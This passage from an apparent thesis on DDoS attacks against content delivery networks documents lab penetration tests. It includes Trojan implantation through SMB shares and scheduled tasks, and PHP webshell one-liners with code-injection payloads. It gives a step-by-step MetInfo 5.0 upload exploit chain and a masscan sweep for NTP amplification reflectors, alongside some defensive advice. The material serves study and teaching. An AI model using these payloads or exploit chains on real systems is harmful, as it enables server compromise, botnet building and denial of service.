file or folder on a network which contains the server name) address in address bar of my
computer. The forms are shown below:
1
\\ IP of file sharing server
2
\\ IP of file sharing server\sharing name
3
For example: \\ 10.1.1.1\share
Figure 5.10 showed the sharing name of services which depends on file system of the
host, there are C$, D$, E$, F$, ADMIN$ and IPC$. IPC$ share is known as a null session
connection. Actually, attackers can utilize IPC$ to execute operations remotely on sharing
host to get access to all files indirectly. As long as port 445 is open, then host is available
for access.
44
Analysis of DDoS attacks against content delivery networks
==PAGE:53==
Figure 5.10: Displayed result of open port 445
About port scanning, there are a lot of tools available, such as NMAP which has a strong
ability to scan all hosts in the same local area network and their open ports.
About password cracking, not only password cracking tools, some other social engineer­
ing tools are used to generate user name and password dictionaries which are based on
the collected private information of victims. Hydra is the most famous brute­force pass­
word cracking tool. Here NTscan is used for this lab, because it combines the port scan­
ning and password cracking functions. It is a simple and practical port scanning software
which supports IPC$, SMB, WMI and some other services using weak NT passwords. In
windows network, NT(new technology) LAN Manager(NTML) is a suite of Microsoft secu­
rity protocols aiming to provide confidentiality, integrity and authentication to users. NTML
passwords are considered weak because they can be brute­forced easily by some current
hardware or software. So attackers can rewrite the user name and password dictionaries,
then this tool will import dictionaries automatically and keep trying to establish connections
on specific services with specified dictionaries. Theoretically, it is easier to crack servers’
passwords because most user name of servers is administrator which will reduce huge
workload. So in this lab, content of user name dictionary are only “administrator”, “guest”
and “win$”. As for passwords dictionary, some simple passwords and correct password
will be contained. Figure 5.11 showed the user name and password were cracked and
found. Two hosts were successfully connected via port 445 with correct passwords which
are attacker’s host and victim’s host.
Analysis of DDoS attacks against content delivery networks
45
==PAGE:54==
Figure 5.11: Username and password cracking by NTscan
As figure 5.12 shown, NTscan firstly scanned the open port 445 successfully and tried to
establish connection by using its default dictionaries.
46
Analysis of DDoS attacks against content delivery networks
==PAGE:55==
Figure 5.12: Port scanning by NTscan
Here some tips are mentioned to defend this vulnerabilities. Close corresponding service
ports or set advanced firewall strategies to mute all inbound requests which want to ac­
cess port 445. Typically, in companies, people usually set similar firewall strategies to
block external traffic. However, in local private network, some other defending methods
like a combination of VLAN and ACL can isolate those traffic flow between hosts. There
are two methods for individuals to close ports manually.
• If hosts are not bound to any domains, which means they do not belong to any
working group, then use command “net share IPC$ /del” to remove sharing service.
• The second way to block system to generate hidden sharing services automatically
is to modify regedit. Locate the position
1
HKEY\_Local\_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\
and create a new key “AutoShareServer” in the type of “REG_DWORD”. Then set
the key value to 0.
6.implant Trojan virus into target host Then copy this Trojan virus to the victim’s computer
by
1
copy c:\test.exe \\172.31.17.130\c$
7.Set time schedule for virus to execute However, it is impossible for victim to click and
execute the malicious file, so time schedule of tasks to be executed at specified time is
necessary by
Analysis of DDoS attacks against content delivery networks
47
==PAGE:56==
1
at \\172.31.17.130 07:45 c:\test.exe
As long as specified real time of system arrived, the Trojan file was triggered to be ex­
ecuted and Trojan virus process were installed in the specific folder disguised as “IEX­
PLORER.EXE”.
8.Take control of root privilege of target host So Figure 5.13 shows the successful case of
victim’s host implanted with virus. Attacker already had the absolute root privilege to con­
trol the personal host as one more zombie host in bot net. Whole process were showed
in video with link ”https://www.youtube.com/watch?v=78x9mm6gvVs&feature=youtu.be”.
Figure 5.13: Privilege escalation on person host by implanting trojan virus
More details should be added after multiple tests, about the security group rules, 8000
port should be added in inbound and outbound rules because the Trojan generating tool
applied NAT to translate private IP address with specific port 8000(port number can be
defined freely) to trace back the server’s public IP or private IP address with the same
port 8000. The mapping relationship of IP address is the key of remote control by Trojan
virus. After testing, public or private IP address of attacker were all valid when generating
Trojan virus. There are many other ways to generate Trojan like Msfvenom in Kali Linux
which generate payload by using attacking module ”windows/meterterpreter/reverse_tcp”.
Similar to grey pigeon, attacker still needs to define his own IP address and specify port.
One solution to check whether computer for daily use is under control or not is to check
ports regularly by
1
netstat -an
48
Analysis of DDoS attacks against content delivery networks
==PAGE:57==
5.5
Penetration on web servers
Besides personal host penetration to establish or enhance bot net. Attackers usually try
to penetrate servers as well to get access to database, destroy services or tracing back
the real IP address of servers by taking edge servers as a stepping stone.
Content delivery network refers to a network using edge servers close to each user’s
server to provide faster and more reliable music, pictures, video, application and other
documents for users. CDN nodes will be located in multiple locations with in different net­
works. Those nodes dynamically transmit content to each other, optimize the download
behavior of users, and thereby reduce the bandwidth cost required by content providers,
improve the download speed of users stability of the system.
5.5.1
IP tracing methods
To some extents, CDN can only mitigate DDoS attacks. Generally, CDN will assign many
IP addresses in different provinces and cities, then resolve the latest IP address in each
place through smart DNS. So for some attackers, when they find out there are so many
IP address of the target websites, probably they will give up conducting attacks which
requires huge bandwidth and traffic costs. However, some hackers could still attack IP
addresses one by one, city by city until all servers are taken down. Because there are
many nodes in CDN, but the bandwidth of each node is not large. So all defending meth­
ods has the only one intention: protect and hide the real IP address of servers. The worst
thing is that real IP address was exposed. The following parts listed several ways to trace
real IP address to save cost for DDoS attack [Zhi19].
1. Query the history record of DNS:
There are plenty of DNS record searching websites available online. To test its practical
affects, author of the paper registered one domain name on “goDaddy.com”. To make it
work, host name of domain name ”lzhzzzs.xyz” was set as “www”. And type A record of
DNS should be added which directly points to the cloud server ECS. Details were shown
in figure 5.14 and figure 5.15.
Figure 5.14: Enable domain name service on Godaddy
Analysis of DDoS attacks against content delivery networks
49
==PAGE:58==
Figure 5.15: DNS record table on Godaddy
Here two websites were used to check DNS records. The first one is “dawhois.com”, as
shown in figure 5.16 and figure 5.17. Due to the lab deployment was quite simple, only
one server here. So on the geographical diagram, route traced only passed hops within
5 different places. But “dawhois.com” did not get the real IP address successfully.
Figure 5.16: DNS query result from dawhois
50
Analysis of DDoS attacks against content delivery networks
==PAGE:59==
Figure 5.17: Hop information of domain name provided by dawhois
Then another DNS record searching website “x.threatbook.cn” successfully searched all
history of the specified domain name and get the real IP address 47.92.77.127. As shown
in figure 5.18 and figure 5.19. It can even conduct reverse query of this IP address and
collected all historical domain names which were assigned on the IP in time order. How­
ever, for large website, there could be a mass of IP address and most of them were just
IP addresses of edge servers. So in that case, This method will not be so effective.
Figure 5.18: Real IP address of domain name searched
Analysis of DDoS attacks against content delivery networks
51
==PAGE:60==
Figure 5.19: Reverse query of IP address
2. Subdomain name query
Due to the cost of CDN and reverse proxy, some websites only use CDN or reverse proxy
for the much more commonly used domain names. Sometimes some test subdomain
names and new subdomain names were not set in CDN. So it is possible to find real IP
address of those websites by query subdomain names. Tools like “Sublist3r” can list the
subdomain names of website based on the search engines.
3. Nslookup
Different DNS servers could provide different query results of the same domain name,
figure 5.20 shows the query result with specifying different DNS servers. Tools like “just­
ping”, dozens of DNS server nodes around the world ping the target domain name, there
is a good chance of finding the real IP address.
Figure 5.20: DNS query result by nslookup
4. Exploit vulnerabilities in websites to achieve the real IP address
52
Analysis of DDoS attacks against content delivery networks
==PAGE:61==
This method could be a relatively reliable way to find out real IP based on a server with po­
tential threats. Obtain real IP through the information leakage of website, such as phpinfo
leakage, github information leakage, command execution, etc. In lab part, vulnerability of
file uploading was exploited, trojan virus was implanted in the server to get root privilege.
Then utilize the zombie server to trace IP would be more reliable.
5. Web mail subscription
A large amount of websites have subscription services, make websites send emails to
attackers themselves(when registering, verifying passwords), and check the source code
of email header information to get the real IP address. Example was shown in figure 5.21.
Figure 5.21: Real IP address obtained by mail subscription
5.5.2
Web vulnerability­file uploading
File uploading is one of the essential functions of web applications, such as uploading
profile picture to display personal status, uploading files for sharing, uploading scripts to
update websites, etc. If the server was configured improperly or files uploaded had not
been filtered, web users can easily upload malicious scripts files which causes file upload­
ing vulnerability. The following parts listed the necessary background information about
exploiting web vulnerability.
Webshell: In computer science, Shell is different from kernel which aims to provide an
user interface of the operating system like cmd.exe in windows system and bash in Linux.
Webshell is a backdoor of a website and a command interpreter as well [Pro20]. It works
in the form of web with communicating via HTTP protocol. Webshell inherits privileges of
web users. Essentially, WebShell is an executable script file which receives commands
from web users and execute them on the server side whose suffix names are usually
.php/.asp/.aspx/.jsp. If the file folder has write permission, then attackers can directly
upload backdoors and get privilege escalation. WebShell can be a website Trojan virus,
which can be divided into two main categories, the complete trojan virus and one sentence
trojan virus. With complete trojan virus, attackers can manage files, execute system com­
Analysis of DDoS attacks against content delivery networks
53
==PAGE:62==
mands and conduct some custom functions. As for one sentence trojan virus, it should
be used combining management platform of trojan virus(command operation interface).
Examples were shown in listings listing 5.1:
1
ASP:
2
<%eval request“(”cmd)%>
3
4
ASP.NET:
5
<%@ Page Language = “”Jscript%>
6
<%eval(Request.Item“[”cmd], ””unsafe);%>
7
8
PHP:
9
<?php @eval($_REQUEST‘[’cmd]);?>
10
}
Listing 5.1: one sentence trojan virus
The combination of management tools and one sentence trojan can implement 3 basic
functions:
• File management: attackers can check, upload, download, modify, delete and even
execute files.
• Virtual terminal: attackers can use command line interface and execute commands
which is similar to cmd and bash.
• Database management: As long as get the username and passwords of database,
it is more convenient to conduct modifications on database.
GetShell: Getshell is the process and result of achieving web privileges. File uploading
is the common way but not the only way. GetShell requires some specific conditions:
• Web servers should enable file uploading and its corresponding application interface
should be open to the external network which means all web users can get access
to it.
• Web users should have write and execute permissions on the target directory.
• If want to utilize file uploading vulnerability perfectly, files uploaded should be able
to executed which means web containers allow scripts uploaded to be parsed.
• If servers enable PUT methods. Then all conditions above are not required.
5.5.3
PHP code injection
PHP code injection belongs to the attack type RCE(remote code execution). Attackers
can run code of root privileges on a server which possesses the appropriate weakness.
The application filter mechanism is not strict, users can inject malicious codes into the
application to be executed which is similar to SQL injection. Here codes will be injected
in applications and executed by servers rather than injected in database.
Relative functions and codes which could cause vulnerability [Xia20].
1. eval() and assert(): those functions and syntax structure will execute PHP code as
string, eval() is syntax structure not a function in PHP. Listing listing 5.2 were the example
codes.
1
<? php
2
if(isset($_GET‘[’code])){
3
$code = $_GET‘[’code];
54
Analysis of DDoS attacks against content delivery networks
==PAGE:63==
4
eval($code);
5
}else{
6
Echo “Please submit code!<br
/>?code=phpinfo();";
7
}
8
?>
Listing 5.2: code injection caused by eval()
$_GET, $_POST, $_COOKIE or $_REQUEST, those predefined superglobal vari­
ables can pass input from clients to the server side. To make use of it, commands need
to be executed should be passed as parameters.
1
http://127.0.0.1/?code=phpinfo();
In this case, phpinfo() passed from clients were assigned to variable “code” and executed
by eval(). Then phpinfo page will be displayed. assert() function works in the same way.
Two conditions are required before exploit eval() function.
• Programs contain executable PHP functions and similar syntax structure.
• Parameters are controllable by clients, users can directly modify passed parame­
ters.
2. preg_replace(): Preg_replace() performs a regular expression search and replace.
Listing listing 5.3 showed the the complete introduction of the function.
1
preg_replace ( string|array $pattern , string|array $replacement , string|
array $subject [, int $limit = -1 [, int&$count = null ]] ) : string|array
|null
Listing 5.3: code injection caused by eval()
It searches “subject” for matches to “pattern” and replaces them with “replacement”. How­
ever, when the first parameter has “e” included, value of $replacement will be executed
as php codes. ‘
1’ represents the content in string “$code” which is matched at the first time. ‘.*’ means
the pattern can be repeated any times. So users just have to submit parameters like
1
http://127.0.0.1/?code=[phpinfo()]
Listing listing 5.4 were the example test codes.
1
<?php
2
If(isset($_GET‘[’code])){
3
$code=$_GET‘[’code];
4
preg_replace“(/\[(.*)\]/”e , ’’\\1, $code);
5
}else{”
6
echo?code=[phpinfo()”];
7
}
8
?>
Listing 5.4: code injection caused by pregreplace
3. call_user_func(): This kind of functions can call other functions and one of its pa­
rameters will be used as the function name of functions called. If the passed function
Analysis of DDoS attacks against content delivery networks
55
==PAGE:64==
name is controllable then users can call other functions to execute malicious codes. This
kind of function can still can eval() or assert() to indirectly execute malicious codes. For
example, users submit parameters
1
http://127.0.0.1/?fun=assert&para=phpinfo();
Listing listing 5.5 were the example test codes.
1
<?php
2
If(isset($_REQUEST‘[’fun])){
3
$fun=$_REQUEST‘[’fun];
4
$para=$_REQUEST‘[’para];
5
Call_user_func($fun,$para);
6
}else{”
7
echo?fun=assert&amp;para=phpinfo()”;
8
}
9
?>
Listing 5.5: code injection caused by call_user_func()
4. Dynamic function $a($b): Due to some features of PHP, PHP functions can be called
directly by concatenation which results in the difficulty of language security. Dynamic
function applies the same rule as call_user_func(). The initial intention was to call func­
tions more conveniently, but can cause vulnerability as well. For example, users submit
parameters
1
http://127.0.0.1/?a=assert&b=phpinfo();
Listing listing 5.6 were the example test codes.
1
<?php
2
If(isset($REQUEST‘[’a])){
3
$a=$_REQUEST‘[’a];
4
$b=$_REQUEST‘[’b];
5
$a($b);
6
}else{
7
echo “
8
?a=assert&amp;b=phpinfo()”;
9
}
10
?>
Listing 5.6: code injection caused by dynamic function
There are 4 common ways to utilize code injection vulnerability.
• The first one is to get shell directly, which requires the combination of trojan manage­
ment platform and one sentence trojan. Those trojan management platform usually
ask attackers to set a connection password. For example, set password as “1”, then
submit parameters
1
http://127.0.0.1/?code=@eval($_POST[1]);
which will establish connections between servers and attackers’ host.
56
Analysis of DDoS attacks against content delivery networks
==PAGE:65==
• The second usage is to get the current absolute file path. In PHP, __FILE__ is a
predefined variable which refers to the current directory of files. Attackers can get
results as long as submit parameters
1
http://127.0.0.1/?code=print(__FILE__);
• The third possible risk is that attackers can read files with code injection. Function
file_get_contents() can read any file on servers as long as attackers know the tar­
get file path and the read permission of corresponding file folders. For example,
attackers submit
1
http://127.0.0.1/?code=var_dump(file_get_contents('c:\windows\system32\
drivers\etc\hosts'));
to read hosts file of servers and get the mappings of IP addresses to host names.
• The last risk is to write files in the system. Function file_put_contents() can help
attackers write files when they know which directories have write permission. Submit
1
http://127.0.0.1/?code=var_dump(file_put_contents($_POST[1],$_POST[2]));
and use Hackbar(a tool can modify and send HTTP requests to servers for API
testing) to submit additional contents
1
1=shell.php&2=<?php phpinfo()?>
File shell.php will be created in the current file folder and its content is phpinfo().
The most effective ways to defend code injection is to disable those specific functions and
filter parameters strictly before they are passed. Figure 5.22 showed the result of banning
assert function.
Figure 5.22: Result returned when assert was banned in PHP configuration file
5.5.4
Content management system
Due to the common use of content management system(CMS), it is possible to exploit
some CMS with vulnerabilities. CMS is a computer software used to manage the content
of websites which provides various types of web modules. Currently, a lot of enterprises
applied CMS from different network companies, modify contents and redevelop the mod­
ules to deploy their own websites. Examples are like dedeCMS, PHPCMS, etc. However,
most of those CMS had file uploading vulnerabilities.
Analysis of DDoS attacks against content delivery networks
57
==PAGE:66==
In lab part, one typical CMS was deployed which is called “metinfoV 5.0” [cak18]. The
system contains SQL injection, file inclusion and file uploading vulnerabilities. All those
vulnerabilities derived from one reason: variable overriding. The lab showed the whole
process of penetration test on a server which published websites with vulnerabilities.
The variable overriding vulnerability exists in a specific syntactic structure. The output of
the listing listing 5.7 is “123”. Even variable name was not predefined yet but double $
can define the received variable “$key” as the name of a new variable. In this case, $$key
representing $new was assigned value(123) of $val. This syntactic structure would cause
possible variables predefined to be tampered. Attackers may exploit the vulnerability to
modify specific parameters of web applications.
1
<?php
2
foreach($_GET as $key=>$val)
3
//var_dump($key);
4
//var_dump($val);
5
$$key=$val;
6
}
7
//input “?new = ”123
8
Var_dump($new);
9
?>
Listing 5.7: code injection caused by dynamic function
5.6
Lab2: Penetration test on servers with CMS metinfov5.0
based on variable overriding
In this lab, enterprise CMS was applied and websites were deployed by PHPstudy. It is
convenient to use phpstudy as long as all CMS files were saved in the folder “WWW”
and directly access public IP address. Then the installation page showed up. The final
result was shown in figure 5.23. The environment for penetrating a web server is listed
below:
• Windows Server 2008(47.92.77.127)
• PHPStudy
• Metinfo V5.0(vulnerabilities exist in file uploadify.php)
• Antsword(one sentence trojan virus management platform)
• Complete Trojan virus
58
Analysis of DDoS attacks against content delivery networks
==PAGE:67==
Figure 5.23: Content management system web module
Steps:
1. The first step is to find out where could make attackers able to upload malicious file to
the websites. So it is necessary to review and analyze source codes of web modules of
“MetinfoV 5.0”. The logic is that there are a bunch of if −else sentences which means all
conditions should be satisfied when web users try to upload files on servers. As long as
one of those conditions fails, the script would stop executing by function die(). Then the
attacking methodology is trying to cross those if −else judgement statements and con­
struct proper input to upload files successfully. So when directly access uploadify.php,
script stopped executing instantly as shown in figure 5.24.
Figure 5.24: First failure of uploading file to server
The listings listing 5.8 showed the key codes which caused vulnerabilities after analyzing
the source codes of CMS.
1
foreach(array‘(’_COOKIE , ‘’_POST, ‘’_GET)
as $_request) {
2
foreach($$_request as $_key => $_value) {
3
$_key{0} != ‘’_ && $$_key = daddslashes($_value);
4
}
5
}
Listing 5.8: code injection caused by variable overriding
Analysis of DDoS attacks against content delivery networks
59
==PAGE:68==
As long as variable overriding syntactic structure existed, all system variables can be mod­
ified as attackers wanted. There are two system variables in uploadify.php: “metinfo_admin_id”
and “metinfo_admin_pass”. The first attempt was to define those variables from client
side:
1
http://47.92.77.127/admin/include/uploadify.php?metinfo_admin_id=aaa&
metinfo_admin_pass=bbb
to check if attackers can enter the judgement statement or directly die. The result was
shown in figure 5.25. Predefined value showed up which means as long as two variables
were defined, script will execute its logic to the next judgement statement.
Figure 5.25: Second failure of uploading file to server
2. The second condition was SQL sentence, to cross the if −else statement, SQL query
should be true. This was the SQL injection point. Source codes of CMS were in listing
listing 5.9.
1
if(!$metinfo_admin_id||!$metinfo_admin_pass){
2
echo $lang_uplaoderr1;
3
//echo “<hr ”/>; to check whether entered if-else
4
die();
5
}else{
6
$admincp_ok = $db->get_one("SELECT * FROM $met_admin_table WHERE id='
$metinfo_admin_id' and admin_pass='$metinfo_admin_pass' and usertype='3'
");
7
if(!$admincp_ok){
8
echo $metinfo_admin_id.$lang_uplaoderr1;
9
die();
10
}
11
}
Listing 5.9: First part of source codes about file uploading in CMS
There was a table which was called “met_admin_table”. Still define it with a random value
and got the return value from web servers which means the table can be tampered as well.
To make the whole SQL query sentence invalid and become true all the time. %23(#) can
be added after defining the original value of the table:
1
http://47.92.77.127/admin/include/uploadify.php?metinfo_admin_id=aaa&
metinfo_admin_pass=bbb&&met_admin_table=met_admin_table%23
when constructing input as above, all contents after met_admin_table in the SQL query
sentence would be ignored. Syntax of SQL caused that potential risks. Here SQL in­
jection part will not be explained in detail. In one word, valid part of SQL query became
60
Analysis of DDoS attacks against content delivery networks
==PAGE:69==
“SELECT ∗FROM $met_admin_table”. So this SQL query is always true. And the
second judgement statement had been crossed. The result was shown in figure 5.26.
Figure 5.26: Third failure of uploading file to server
3. Listing listing 5.10 showed the second part of source codes in CMS.
1
elseif($type=='upfile'){
2
$f = new upfile($met_file_format ,'../../upload/file/',$met_file_maxsize ,'','
1','|');
3
$file = $f->upload('Filedata');
4
if($f->get_error()){
5
echo $f->get_errorcode();
6
die();
7
}
8
$metinfo='1$'.$file;
9
if($module==4)$metinfo.='|'.$filesize;
Listing 5.10: Second part of source codes about file uploading in CMS
There are many types of files which are allowed to be uploaded on servers such as CSV
files, img files, small icons, SQL files, modules, etc. Those judgement statements defined
in uploadify.php were not going to be listed. The only useful type is ‘upfile’. Input should
be reconstructed as
1
http://47.92.77.127/admin/include/uploadify.php?metinfo_admin_id=aaa&
metinfo_admin_pass=bbb&&met_admin_table=met_admin_table%23&type=upfile
Output changed again as shown in figure 5.27.
Figure 5.27: Fourth failure of uploading file to server
Another variable “$met_file_format” in the judgement statement defined the formats of
files allowed to be uploaded. For attackers it is impossible to check codes at back­end.
So usually, they guess some common types of files like jpg/jpeg/.jpg/.gif/.bmp. Input
reconstructed again:
1
http://47.92.77.127/admin/include/uploadify.php?metinfo_admin_id=aaa&
metinfo_admin_pass=bbb&&met_admin_table=met_admin_table%23&type=upfile&
met_file_format=jpg|php
Analysis of DDoS attacks against content delivery networks
61
==PAGE:70==
Output did not show any error messages which meant the input constructed was complete.
4. To send one sentence trojan virus. Attackers will construct forms and submit malicious
files to trigger the virus. Here input variable “Filedata” corresponds to the variable in the
third judgement statement above. Forms constructed as follows in listing listing 5.11.
1
<html>
2
<form
3
enctype”=multipart/form-”data
4
method”=”post
5
Name”=”testForm
6
Action“=http://47.92.77.127/admin/include/uploadify.php?metinfo_admin_id=aaa&
metinfo_admin_pass=bbb&&met_admin_table=met_admin_table%23&type=upfile&
met_file_format=jpg|php"
7
>
8
<input name”=”Filedata
type”=”file size=20>
9
<input type”=”submit name”=”Submit value”=”submit >
10
</form>
11
</html>
Listing 5.11: Form construction to submit malicious file
Here for test, a file with content of phpinfo() was uploaded and result showed in figure
5.28. PHP format files were not allowed to upload. Even php files were in the white lists
which means the extension of files were filtered somewhere.
Figure 5.28: Fifth failure of uploading file to server
5. Uplodify.php contains one class file of “upfile” type. By checking codes in listing
listing 5.12 in upfile.class. Designer did filtering operations on extension of uploaded
files.
1
if (!$this->overwrite && file_exists($this->savename)) {
2
return $this->halt($this->savename." $lang_upfileTip2");
3
}
4
$this->format=str_replace("php","",strtolower($this->format));
5
$this->format=str_replace("aspx","",strtolower($this->format));
6
$this->format=str_replace("asp","",strtolower($this->format));
7
$this->format=str_replace("jsp","",strtolower($this->format));
8
$this->format=str_replace("js","",strtolower($this->format));
Listing 5.12: Source codes about file extension filtering in CMS
So file extensions defined in input should be constructed as “jpg|pphphp”. Then one php
was filtered, the other was still left. Output from servers in figure 5.29 showed that file
was already uploaded successfully.
62
Analysis of DDoS attacks against content delivery networks
==PAGE:71==
Figure 5.29: success of uploading file to server
Then use the returned file path to get access to the uploaded file and make it execute.
Final result was showed in figure 5.30.
Figure 5.30: success of uploading malicious script to server
6. The next step is upload one sentence trojan virus and use antSword to establish con­
nections between target server and attacker’s host. One sentence trojan virus here was
constructed as
1
<?php @eval($_REQUEST‘[’shell]);?>
Then use antSword to set the same connection password as 1 and establish connection
between target server and host. The last step is to upload complete trojan virus to get root
privilege of the whole server. However, this part can not be explained in detail because
ECSs in VPC have set advanced firewalls and blacklists, as long as malicious operations
were conducted, they can be detected in seconds and the source IP address will be added
in blacklist. So all access will be blocked and all attempting connections will be reset. Tro­
jan virus and antSword were still attached to the paper. Figure 5.31 showed the warning
Analysis of DDoS attacks against content delivery networks
63
==PAGE:72==
information provided by monitoring platform by Alicloud. More details were showed in
video with link ”https://www.youtube.com/watch?v=751591Tq0MI&feature=youtu.be”.
Figure 5.31: Warning information provided by entities monitoring platform of Alicloud
Figure 5.32 showed the API of trojan management platform antsword.
Figure 5.32: API of trojan management platform antsword
5.7
UDP DDoS
There are various types of DDoS attacks, but in this article, UDP NTP amplification DDoS
attack will be analyzed in detail [Chu19]. Because the available hacker­class DDoS API
provided by an illegal hacking group works based on the this type of DDoS attack. UDP
flood is an increasingly used traffic­type DOS attack, the most common case is that at­
tackers use huge amount of UDP small packets to crash DNS servers, authentication
64
Analysis of DDoS attacks against content delivery networks
==PAGE:73==
servers or media streaming servers. Typically, a UDP flood of 100k pps(packets per sec­
ond) often paralyzes the backbone equipment such as firewall, resulting in the paralysis
of the entire network segment. As UDP protocol is a connectionless service, in the UDP
flood attack, the attacker can send a large number of small UDP packets that forge the
source IP address. However, because UDP protol is connectionless, so as long as a UDP
port is opened to provided relevant services, then attacks can be carried out based on the
relevant services. Under normal circumstances, a large number of UDP packets for the
target IP would appear on one side, and the content and size are relatively fixed.
About defense, UDP protocol is different from TCP protocol in that it is a connection­
less protocol. Moreover, UDP application protocols are diverse and highly different, so
it is difficult to protect UDP Flood. Its protection should be treated according to specific
scenarios. The 6 common methods are:
• Check the size of the data packet, if it is a large packet attack, apply UDP anti­
fragmentation method: reset the size of fragments before reassembling, usually no
less than 1500. In extreme cases, all UDP fragments can be dropped.
• If port providing service is under attack, set the size of maximum UDP packet ac­
cording to the size of possible largest business UDP packets to filter abnormal traffic.
• If port is a non­business port: establish a UDP connection rule, which requires that
all UDP packets passing through the port must first establish a TCP connection to
the TCP port. However, this method requires professional firewalls or other security
devices to support.
• Set the limit of packet rate. Enable the threshold of UDP packets to the same port
with the same IP address, if servers are web servers, the limit can be more strict.
• Message content features­pattern match: pattern match rules are mainly used to
filter packets with predefined feature characters.
• Define ACL filtering mechanism: fixed source and destination IP, traffic over 1G will
be filtered on the network devices.
Because most IP does not provide UDP service, so UDP traffic can be dropped. Cur­
rently, pure UDP traffic attack is relatively rare. Instead, DNS Query Flood attack is more
common. In one word, a DDoS attack launched on the upper layer of the protocol is more
difficult to defend, because the higher protocol is, the more relevant it is to the business,
and the more complex the situation the defending system will face.
5.7.1
UDP NTP amplification reflection DDoS attack
NTP amplification is a DDoS attack based on UDP, attacker uses the publicly accessible
NTP(Network Time protocol) server to attack the target site server with a large number
of traffic with the UDP traffic. Then make it impossible for regular traffic to access the
target and surrounding infrastructure. Network Time protocol is one of the earliest net­
work protocols to synchronize the clocks of internet­connected devices. The common
used port is UDP 123. In addition to clock synchronization, older versions of NTP also
support monitoring services that allow administrators to monitor traffic on a given NTP
server. This command, called “monlist”, sends a list of the last 600 hosts connected to
the query server to the requester. In most basic types of NTP amplification attacks, at­
tacker repeatedly sends a “get monlist” requests to the NTP server, using the victim’s
server IP address as the IP address of the requesting server. NTP server responds by
sending the list to the spoofed IP address. This response is far more than the number of
Analysis of DDoS attacks against content delivery networks
65
==PAGE:74==
requests, amplifying the traffic to the target server and ultimately rendering the legitimate
request service unavailable.
All amplification attacks exploit the bandwidth cost difference between the attacker and
the target Web resource. When the cost difference is amplified across many requests,
the generated traffic can break the network infrastructure. By sending small queries that
result in a large number of responses, a malicious user will use bot net to help attack.
When having multiple times per bot to make similar requests, the attacker can launch
DDoS attack with traffic up to 100Gbps. NTP amplification is essentially a reflection at­
tack. A reflection attack is to trick the server into responding to a deceptive IP address.
The attacker sends a packet with a forged IP address(victim’s IP address) and the server
responds to that address. The biggest advantage of reflection attack is that it can help
attack hide his source IP address. So victims have no clues to trace back the attacking
hosts. Reflection attacks are very dangerous, but when they are amplified they become
even more dangerous. In this case, “amplification” means to trigger a server response
which is disproportionate to the original packet request. In the case of NTP amplification,
this refers to the size of the “monlist”, not the size of the original packet. In a typical
DNS amplification, the ratio of requests to responses is 70:1. This means that an attacker
who controls a 1Gbps machine can effectively send 70Gbps of traffic directly to the tar­
get server. DNS flood attack is different from DNS amplification attack. Different form
DNS flooding, DNS amplification attack reflects and amplifies the traffic of insecure DNS
servers to hide the origin IP address of the attack and improve its effectiveness. DNS am­
plification attacks use devices with low bandwidth to make large numbers of requests to
insecure DNS servers. These devices make many small requests for large DNS records,
but at the time of the request, the attacker’s forged return address is the address of the
intended victim. Amplification allows an attacker to use only limited attack resources to
obtain a larger target. In a NTP amplification attack, the request­response ratio ranges
from 20:1 to 200:1, or even more. This means that any attacker who has access to open
NTP server(for example, using the Metasploit tool or data from an open NTP project) can
easily launch a high­bandwidth, high­volume DDoS attack.
Network time protocol is designed to allow internet­connected devices to synchronize
their internal clocks and is significant in the architecture of the internet. By taking advan­
tage of the “monlist” command enabled on some NTP servers, an attacker can multiply
its initial request traffic to produce a larger response. By default, enable this command on
old devices and respond with the last 600 source IP addresses that have sent requests
to the NTP server. A “monlist” request from a server with 600 IP addresses in its mem­
ory would be 200 times larger than the origin request. This means that an attacker with
1GB of internet traffic can conduct more than 200 GB of attack and result in a significant
increase in attack traffic.
NTP amplification attack can be divided into 4 steps:
1. Attacker uses zombie hosts in botnet to send UDP packets with deceptive IP ad­
dresses to the NTP server with “monlist” command enabled. The spoofed IP address
on each packet points to the victim’s real IP address. 2. Each UDP packet makes a
request to the NTP server using its “monlist” command, resulting in a large number of
responses. 3.The server then response victim’s IP address with the result data response.
4.The target’s IP address receives the response, and the surrounding network infrastruc­
ture becomes overwhelmed with traffic, leading to denial of service.
66
Analysis of DDoS attacks against content delivery networks
==PAGE:75==
Because attack traffic loos like legitimate traffic form valid server, it is difficult to mitigate
such attack traffic without blocking legitimate activity from a real NTP server. Because
UDP packets do not require a handshake, the NTP server sends a large number of re­
sponses to the target server without verifying that the request is trustworthy. These facts,
combined with built­in commands, send a large number of responses, making a NTP
server an excellent source of reflection for DDoS amplification attacks. The attacking
logic was shown in figure 5.33.
Figure 5.33: Attacking logic Of NTP DDoS
5.7.2
NTP DDoS mitigation method
Like many other DDoS attack, mitigating the NTP amplification attack is a challenge be­
cause the response from the NTP server appears to be legitimate traffic from the valid
user. Moreover, the absolute value of DDoS traffic can easily overwhelm even the most
resilient network infrastructure. Mitigation options are limited for individuals or companies
that operate websites or services. This is because internet service provider(ISP) or other
high level infrastructure provider may not be able to handle incoming traffic. As a result,
ISP might send all traffic to the IP address of victims, protecting itself and rendering the
target site servers crashed down.
Two possible approaches are:
• Disable monlist and reduce the number of NTP servers that support the monlist
command. The simple solution to fixing “monlist” vulnerability is to disable this
command. By default, all versions of NTP software earlier than 4.2.7 are vulnerable.
By upgrading the NTP server to 4.2.7 or later, the command is disabled, thus fixing
the vulnerability. If the upgrade is not possible, server’s administrators should make
necessary changes following US­CERT instructions [CCE14].
• Source IP authentication­prevent fraudulent packets from leaving the network. Since
the UDP request sent by the attacker botnet must have the source IP address that
spoofed the victim’s IP address, the key component that reduces the effectiveness
of a UDP­based amplification attack is that the ISP rejects any IP address which is
spoofed by internal traffic. If the source address of the packet sent from the internal
network makes it appear to be packet sent from the external network, it may be a
fraudulent packet and should be dropped. It is recommended that all ISP implement
Analysis of DDoS attacks against content delivery networks
67
==PAGE:76==
entry filtering to avoid this vulnerability.
5.8
Lab3: DDoS attack conducted by two types of attacking
tools
In this lab, two tools were used to conduct DDoS attack, a simplified version and a hacker­
class attack tool. Due to the limit of number of devices available, and devices rented on
cloud were not permitted to conduct attacks. As long as detected, cloud servers would be
banned. Still due to the limit of bandwidth of personal host, simplified version attacking
tool can not cause practical damage.
About the simplified version, it can be divided into two steps, the first step was to scan
NTP server lists and the second step was to send malicious requests. Another important
point is that how many NTP servers can amplify the requests. Tool “masscan” which is
an internet­scale port scanner is able to scan the entire Internet to find out servers which
open UDP port 123 with command:
1
sudo ./masscan -pU:123 -oX NTP.xml --rate 10000 47.92.0.0-47.92.255.255
